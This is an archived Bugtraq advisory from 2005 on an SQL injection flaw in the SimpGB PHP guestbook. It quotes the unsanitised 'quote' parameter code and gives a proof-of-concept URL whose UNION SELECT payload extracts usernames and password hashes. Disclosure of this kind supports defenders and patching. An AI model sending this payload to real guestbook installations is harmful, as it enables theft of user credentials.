Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: SimpGB SQL Injection Vulnerability

SimpGB SQL Injection Vulnerability

From: Alexander Müller <visus_at_portsonline.net>
Date: Sun, 13 Mar 2005 17:23:11 +0100

Hi,

The PHP guestbook SimpGB [1], written by Boesch IT-Consulting [2] can be
exploited to gain
userdata. The quote variable isn't checked carefully in
simpgb/include/gb_new.inc called
by guestbook.php.
I wrote a proof of concept which shows a md5 hash and the username, read
from the database.

simpgb/include/gb_new.inc:

50: if(isset($quote) && ($quote))
51: {
52: $sql = "select * from ".$tableprefix."_data where entrynr=$quote";
53: if(!$result = mysql_query($sql, $db))
54: die("Unable to connect to database.".mysql_error());

PoC:

http://[whereever the guestbook is]/simpgb/guestbook.php?lang=de&mode=new
&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201

The developer has been informed.

[1] http://www.boesch-it.de/sw/php-scripts/simpgb/english/download.php
[2] http://www.boesch-it.de

Greets to neonomicus who helped me getting the database structure of SimpGB.

visus
Received on Mar 14 2005

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos